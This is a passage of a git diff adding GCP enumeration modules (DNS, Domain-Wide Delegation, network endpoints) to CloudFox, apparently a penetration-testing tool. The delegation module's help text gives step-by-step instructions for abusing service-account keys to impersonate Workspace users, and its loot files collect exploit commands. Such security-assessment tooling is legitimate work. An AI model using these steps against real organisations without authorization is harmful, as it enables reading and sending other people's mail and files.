"public" { + publicCount++ + } else { + privateCount++ + } + } + + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(m.Zones), len(m.Records)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d public]", publicCount) + } + if privateCount > 0 { + msg += fmt.Sprintf(" [%d private]", privateCount) + } + logger.SuccessM(msg, globals.GCP_DNS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DNSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating DNS in project: %s", projectID), 
globals.GCP_DNS_MODULE_NAME) + } + + ds := DNSService.New() + + // Get zones + zones, err := ds.Zones(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS zones in project %s", projectID)) + return + } + + m.mu.Lock() + m.Zones = append(m.Zones, zones...) + + for _, zone := range zones { + m.addZoneToLoot(zone) + + // Get records for each zone + records, err := ds.Records(projectID, zone.Name) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS records in zone %s", zone.Name)) + continue + } + + m.Records = append(m.Records, records...) + for _, record := range records { + m.addRecordToLoot(record, zone) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d zone(s) in project %s", len(zones), projectID), globals.GCP_DNS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DNSModule) initializeLootFiles() { + m.LootMap["dns-commands"] = &internal.LootFile{ + Name: "dns-commands", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *DNSModule) addZoneToLoot(zone DNSService.ZoneInfo) { + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s | Visibility: %s\n", + zone.Name, zone.DNSName, + zone.ProjectID, zone.Visibility, + ) + + // gcloud commands + m.LootMap["dns-commands"].Contents += fmt.Sprintf( + "gcloud dns managed-zones describe %s --project=%s\n"+ + "gcloud dns record-sets list --zone=%s --project=%s\n", + zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) + + m.LootMap["dns-commands"].Contents += "\n" +} + +func (m *DNSModule) addRecordToLoot(record DNSService.RecordInfo, zone DNSService.ZoneInfo) { + // Records are displayed in the 
table, no separate loot needed +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Zones table with IAM bindings (one row per IAM binding) + zonesHeader := []string{ + "Project Name", + "Project ID", + "Zone Name", + "DNS Name", + "Visibility", + "DNSSEC", + "Networks/Peering", + "Forwarding", + "IAM Role", + "IAM Member", + } + + var zonesBody [][]string + for _, zone := range m.Zones { + // Format DNSSEC + dnssec := zone.DNSSECState + if dnssec == "" { + dnssec = "off" + } + + // Format networks/peering + networkInfo := "-" + if len(zone.PrivateNetworks) > 0 { + networkInfo = strings.Join(zone.PrivateNetworks, ", ") + } else if zone.PeeringNetwork != "" { + networkInfo = fmt.Sprintf("Peering: %s", zone.PeeringNetwork) + if zone.PeeringTargetProject != "" { + networkInfo += fmt.Sprintf(" (%s)", zone.PeeringTargetProject) + } + } + + // Format forwarding + forwarding := "-" + if len(zone.ForwardingTargets) > 0 { + forwarding = strings.Join(zone.ForwardingTargets, ", ") + } + + // If zone has IAM bindings, create one row per binding + if len(zone.IAMBindings) > 0 { + for _, binding := range zone.IAMBindings { + zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + binding.Role, + binding.Member, + }) + } + } else { + // Zone has no IAM bindings - single row + zonesBody = append(zonesBody, []string{ + m.GetProjectName(zone.ProjectID), + zone.ProjectID, + zone.Name, + zone.DNSName, + zone.Visibility, + dnssec, + networkInfo, + forwarding, + "-", + "-", + }) + } + } + + // Records table (interesting types only, no truncation) + recordsHeader := []string{ + "Zone", + "Name", + "Type", + "TTL", + "Data", + } + + var recordsBody [][]string + interestingTypes := map[string]bool{"A": true, "AAAA": true, "CNAME": true, 
"MX": true, "TXT": true, "SRV": true} + for _, record := range m.Records { + if !interestingTypes[record.Type] { + continue + } + + // Format data - no truncation + data := strings.Join(record.RRDatas, ", ") + + recordsBody = append(recordsBody, []string{ + record.ZoneName, + record.Name, + record.Type, + fmt.Sprintf("%d", record.TTL), + data, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: zonesHeader, + Body: zonesBody, + }) + } + + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: recordsHeader, + Body: recordsBody, + }) + } + + output := DNSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go new file mode 100644 index 00000000..98dcef43 --- /dev/null +++ b/gcp/commands/domainwidedelegation.go @@ -0,0 +1,291 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + domainwidedelegationservice "github.com/BishopFox/cloudfox/gcp/services/domainWideDelegationService" + "github.com/BishopFox/cloudfox/globals" + 
"github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDomainWideDelegationCommand = &cobra.Command{ + Use: globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + Aliases: []string{"dwd", "delegation", "workspace-delegation"}, + Short: "Find service accounts with Domain-Wide Delegation to Google Workspace", + Long: `Find service accounts configured for Domain-Wide Delegation (DWD). + +Domain-Wide Delegation allows a service account to impersonate any user in a +Google Workspace domain. This is EXTREMELY powerful and a high-value target. + +With DWD + a service account key, an attacker can: +- Read any user's Gmail +- Access any user's Google Drive +- View any user's Calendar +- Enumerate all users and groups via Admin Directory API +- Send emails as any user +- And much more depending on authorized scopes + +Detection Method: +- Service accounts with OAuth2 Client ID set have DWD enabled +- The actual authorized scopes are configured in Google Admin Console +- We check for naming patterns that suggest DWD purpose + +To Exploit: +1. Obtain a key for the DWD service account +2. Identify a target user email in the Workspace domain +3. Generate tokens with the target user as 'subject' +4. 
Access Workspace APIs as that user + +Note: Scopes must be authorized in Admin Console > Security > API Controls`, + Run: runGCPDomainWideDelegationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DomainWideDelegationModule struct { + gcpinternal.BaseGCPModule + + DWDAccounts []domainwidedelegationservice.DWDServiceAccount + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DomainWideDelegationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DomainWideDelegationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DomainWideDelegationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDomainWideDelegationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + if err != nil { + return + } + + module := &DomainWideDelegationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + DWDAccounts: []domainwidedelegationservice.DWDServiceAccount{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, m.processProject) + + if len(m.DWDAccounts) == 0 { + logger.InfoM("No Domain-Wide Delegation service accounts found", globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + return + } + + // Count confirmed DWD accounts + confirmedDWD := 0 + criticalCount := 0 + for _, account := range m.DWDAccounts { 
+ if account.DWDEnabled { + confirmedDWD++ + } + if account.RiskLevel == "CRITICAL" { + criticalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(m.DWDAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + + if criticalCount > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d DWD accounts with keys - can impersonate Workspace users!", criticalCount), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DomainWideDelegationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking DWD service accounts in project: %s", projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + svc := domainwidedelegationservice.New() + accounts, err := svc.GetDWDServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + fmt.Sprintf("Could not check DWD service accounts in project %s", projectID)) + return + } + + m.mu.Lock() + m.DWDAccounts = append(m.DWDAccounts, accounts...) 
+ + for _, account := range accounts { + m.addAccountToLoot(account) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS && len(accounts) > 0 { + logger.InfoM(fmt.Sprintf("Found %d DWD account(s) in project %s", len(accounts), projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DomainWideDelegationModule) initializeLootFiles() { + m.LootMap["dwd-commands"] = &internal.LootFile{ + Name: "dwd-commands", + Contents: "# Domain-Wide Delegation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegationservice.DWDServiceAccount) { + // Add exploit commands for each account + if len(account.ExploitCommands) > 0 { + m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + "## Service Account: %s (Project: %s)\n"+ + "# DWD Enabled: %v\n"+ + "# OAuth2 Client ID: %s\n"+ + "# Keys: %d user-managed key(s)\n", + account.Email, account.ProjectID, + account.DWDEnabled, + account.OAuth2ClientID, + len(account.Keys), + ) + // List key details + for _, key := range account.Keys { + m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + "# - Key ID: %s (Created: %s, Expires: %s, Algorithm: %s)\n", + key.KeyID, key.CreatedAt, key.ExpiresAt, key.KeyAlgorithm, + ) + } + m.LootMap["dwd-commands"].Contents += "\n" + for _, cmd := range account.ExploitCommands { + m.LootMap["dwd-commands"].Contents += cmd + "\n" + } + m.LootMap["dwd-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main table - one row per key (or one row if no keys) + header := []string{ + "Project ID", + "Project Name", + "Email", + "DWD Enabled", + "OAuth2 Client ID", + "Key ID", + "Key 
Created", + "Key Expires", + "Key Algorithm", + } + + var body [][]string + for _, account := range m.DWDAccounts { + dwdStatus := "No" + if account.DWDEnabled { + dwdStatus = "Yes" + } + + clientID := account.OAuth2ClientID + if clientID == "" { + clientID = "-" + } + + if len(account.Keys) > 0 { + // One row per key + for _, key := range account.Keys { + body = append(body, []string{ + account.ProjectID, + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + key.KeyID, + key.CreatedAt, + key.ExpiresAt, + key.KeyAlgorithm, + }) + } + } else { + // Account with no keys - still show it + body = append(body, []string{ + account.ProjectID, + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + "-", + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "domain-wide-delegation", + Header: header, + Body: body, + }, + } + + output := DomainWideDelegationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go new file mode 100644 index 00000000..1f3baa78 --- /dev/null +++ b/gcp/commands/endpoints.go @@ -0,0 +1,1036 @@ +package commands + +import ( + "context" + "fmt" + 
"strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" +) + +var GCPEndpointsCommand = &cobra.Command{ + Use: "endpoints", + Aliases: []string{"exposure", "external", "public-ips", "internet-facing"}, + Short: "Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames", + Long: `Enumerate all network endpoints in GCP with comprehensive analysis. + +Features: +- Enumerates external IP addresses (static and ephemeral) +- Enumerates internal IP addresses for instances +- Lists load balancers (HTTP(S), TCP, UDP) - both external and internal +- Shows instances with external and internal IPs +- Lists Cloud Run and Cloud Functions URLs +- Analyzes firewall rules to determine open ports +- Generates nmap commands for penetration testing + +Output includes separate tables and loot files for external and internal endpoints.`, + Run: runGCPEndpointsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type Endpoint struct { + ProjectID string + Name string + Type string // Static IP, Instance IP, LoadBalancer, Cloud Run, etc. 
+ Address string + FQDN string + Protocol string + Port string + Resource string + ResourceType string + Region string + Status string + ServiceAccount string + TLSEnabled bool + RiskLevel string + RiskReasons []string + IsExternal bool // true for external IPs, false for internal + NetworkTags []string // Tags for firewall rule matching + Network string // VPC network name +} + +type FirewallRule struct { + ProjectID string + RuleName string + Network string + Direction string + SourceRanges []string + Ports []string + Protocol string + TargetTags []string + RiskLevel string + RiskReasons []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type EndpointsModule struct { + gcpinternal.BaseGCPModule + + ExternalEndpoints []Endpoint + InternalEndpoints []Endpoint + FirewallRules []FirewallRule + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Firewall rule mapping: "network:tag1,tag2" -> allowed ports + // Key format: "network-name" for rules with no target tags, or "network-name:tag1,tag2" for tagged rules + firewallPortMap map[string][]string +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type EndpointsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o EndpointsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o EndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "endpoints") + if err != nil { + return + } + + module := &EndpointsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExternalEndpoints: []Endpoint{}, + InternalEndpoints: []Endpoint{}, + FirewallRules: []FirewallRule{}, + LootMap: make(map[string]*internal.LootFile), + firewallPortMap: 
make(map[string][]string), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) + + totalEndpoints := len(m.ExternalEndpoints) + len(m.InternalEndpoints) + if totalEndpoints == 0 && len(m.FirewallRules) == 0 { + logger.InfoM("No endpoints found", "endpoints") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d external endpoint(s), %d internal endpoint(s), %d firewall rule(s)", + len(m.ExternalEndpoints), len(m.InternalEndpoints), len(m.FirewallRules)), "endpoints") + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *EndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing endpoints in project: %s", projectID), "endpoints") + } + + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Compute service in project %s", projectID)) + return + } + + // 1. Analyze firewall rules FIRST to build port mapping for instances + m.analyzeFirewallRules(ctx, computeService, projectID, logger) + + // 2. Get static external IPs + m.getStaticExternalIPs(ctx, computeService, projectID, logger) + + // 3. Get instances (both external and internal IPs) + m.getInstanceIPs(ctx, computeService, projectID, logger) + + // 4. Get load balancers (both external and internal) + m.getLoadBalancers(ctx, computeService, projectID, logger) + + // 5. 
Get Cloud Run services (always external) + m.getCloudRunServices(ctx, projectID, logger) +} + +// getStaticExternalIPs retrieves static external IP addresses +func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Global addresses + req := svc.GlobalAddresses.List(projectID) + err := req.Pages(ctx, func(page *compute.AddressList) error { + for _, addr := range page.Items { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + Address: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: "global", + Status: addr.Status, + RiskLevel: "Medium", + RiskReasons: []string{"Static external IP"}, + IsExternal: true, + } + if user == "" { + ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + } + m.addEndpoint(ep) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global addresses in project %s", projectID)) + } + + // Regional addresses + regionsReq := svc.Regions.List(projectID) + err = regionsReq.Pages(ctx, func(page *compute.RegionList) error { + for _, region := range page.Items { + addrReq := svc.Addresses.List(projectID, region.Name) + err := addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { + for _, addr := range addrPage.Items { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + Address: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: region.Name, + Status: addr.Status, + RiskLevel: "Medium", + RiskReasons: []string{"Static external IP"}, + IsExternal: true, + } + 
if user == "" { + ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + } + m.addEndpoint(ep) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list addresses in region %s", region.Name)) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regions in project %s", projectID)) + } +} + +// getInstanceIPs retrieves instances with both external and internal IPs +func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + for _, instance := range scopedList.Instances { + zoneName := extractZoneFromScope(zone) + + // Get service account + var serviceAccount string + if len(instance.ServiceAccounts) > 0 { + serviceAccount = instance.ServiceAccounts[0].Email + } + + for _, iface := range instance.NetworkInterfaces { + networkName := extractResourceName(iface.Network) + + // Collect external IPs + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Instance IP", + Address: accessConfig.NatIP, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: true, + NetworkTags: instance.Tags.Items, + Network: networkName, + } + + // Classify risk + ep.RiskLevel, ep.RiskReasons = m.classifyInstanceRisk(instance) + + m.addEndpoint(ep) + } + } + + // Collect internal IPs + if iface.NetworkIP != "" { + // Determine ports from firewall rules + ports := m.getPortsForInstance(networkName, instance.Tags) + + ep := 
Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Internal IP", + Address: iface.NetworkIP, + Protocol: "TCP/UDP", + Port: ports, + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: false, + NetworkTags: instance.Tags.Items, + Network: networkName, + } + + ep.RiskLevel, ep.RiskReasons = m.classifyInternalInstanceRisk(instance, ports) + m.addEndpoint(ep) + } + } + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list instances in project %s", projectID)) + } +} + +// getPortsForInstance determines open ports for an instance based on firewall rules +func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags) string { + var allPorts []string + + // Check for rules with no target tags (apply to all instances in network) + if ports, ok := m.firewallPortMap[network]; ok { + allPorts = append(allPorts, ports...) + } + + // Check for rules matching instance tags + if tags != nil { + for _, tag := range tags.Items { + key := fmt.Sprintf("%s:%s", network, tag) + if ports, ok := m.firewallPortMap[key]; ok { + allPorts = append(allPorts, ports...) 
+ } + } + } + + if len(allPorts) == 0 { + return "ALL" // Unknown, scan all ports + } + + // Deduplicate ports + portSet := make(map[string]bool) + for _, p := range allPorts { + portSet[p] = true + } + var uniquePorts []string + for p := range portSet { + uniquePorts = append(uniquePorts, p) + } + + return strings.Join(uniquePorts, ",") +} + +// classifyInternalInstanceRisk determines risk for internal endpoints +func (m *EndpointsModule) classifyInternalInstanceRisk(instance *compute.Instance, ports string) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Internal network access") + + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 1 + } + + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope") + score += 2 + } + } + } + + // Check for dangerous ports + dangerousPorts := []string{"22", "3389", "3306", "5432", "27017", "6379"} + for _, dp := range dangerousPorts { + if strings.Contains(ports, dp) { + score += 1 + break + } + } + + if score >= 3 { + return "High", reasons + } else if score >= 1 { + return "Medium", reasons + } + return "Low", reasons +} + +// getLoadBalancers retrieves both external and internal load balancers +func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Regional forwarding rules + req := svc.ForwardingRules.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + for _, rule := range scopedList.ForwardingRules { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } else if len(rule.Ports) > 0 { + ports = 
strings.Join(rule.Ports, ",") + } + + target := extractResourceName(rule.Target) + if target == "" && rule.BackendService != "" { + target = extractResourceName(rule.BackendService) + } + + isExternal := rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" + isInternal := rule.LoadBalancingScheme == "INTERNAL" || rule.LoadBalancingScheme == "INTERNAL_MANAGED" || rule.LoadBalancingScheme == "INTERNAL_SELF_MANAGED" + + if isExternal { + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "LoadBalancer", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Medium", + RiskReasons: []string{"External load balancer"}, + IsExternal: true, + Network: extractResourceName(rule.Network), + } + + if !ep.TLSEnabled && ports != "443" { + ep.RiskLevel = "High" + ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") + } + + m.addEndpoint(ep) + } else if isInternal { + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "Internal LB", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Low", + RiskReasons: []string{"Internal load balancer"}, + IsExternal: false, + Network: extractResourceName(rule.Network), + } + + m.addEndpoint(ep) + } + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list forwarding rules in project %s", projectID)) + } + + // Global forwarding rules (external only - no internal global LBs) + globalReq := svc.GlobalForwardingRules.List(projectID) + err = globalReq.Pages(ctx, 
func(page *compute.ForwardingRuleList) error { + for _, rule := range page.Items { + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } + + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "Global LoadBalancer", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: extractResourceName(rule.Target), + ResourceType: "GlobalForwardingRule", + Region: "global", + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Medium", + RiskReasons: []string{"External global load balancer"}, + IsExternal: true, + } + + if !ep.TLSEnabled && ports != "443" { + ep.RiskLevel = "High" + ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") + } + + m.addEndpoint(ep) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) + } +} + +// getCloudRunServices retrieves Cloud Run services with public URLs +func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Cloud Run service in project %s", projectID)) + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + return + } + + for _, service := range resp.Items { + if service.Status != nil && service.Status.Url != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: service.Metadata.Name, + Type: "Cloud Run", + FQDN: service.Status.Url, + Protocol: "HTTPS", + Port: 
"443", + ResourceType: "CloudRun", + TLSEnabled: true, + RiskLevel: "Medium", + RiskReasons: []string{"Public Cloud Run service"}, + IsExternal: true, // Cloud Run services are always external + } + + // Extract region from metadata + if service.Metadata != nil && service.Metadata.Labels != nil { + if region, ok := service.Metadata.Labels["cloud.googleapis.com/location"]; ok { + ep.Region = region + } + } + + // Get service account + if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { + ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName + } + + m.addEndpoint(ep) + } + } +} + +// analyzeFirewallRules analyzes firewall rules and builds port mapping for instances +func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Firewalls.List(projectID) + err := req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + if fw.Direction != "INGRESS" { + continue + } + + networkName := extractResourceName(fw.Network) + + // Collect all allowed ports for this rule + var rulePorts []string + for _, allowed := range fw.Allowed { + if len(allowed.Ports) == 0 { + // No specific ports means all ports for this protocol + rulePorts = append(rulePorts, "ALL") + } else { + rulePorts = append(rulePorts, allowed.Ports...) + } + } + + // Build firewall port map for internal IP port determination + m.mu.Lock() + if len(fw.TargetTags) == 0 { + // Rule applies to all instances in network + m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) 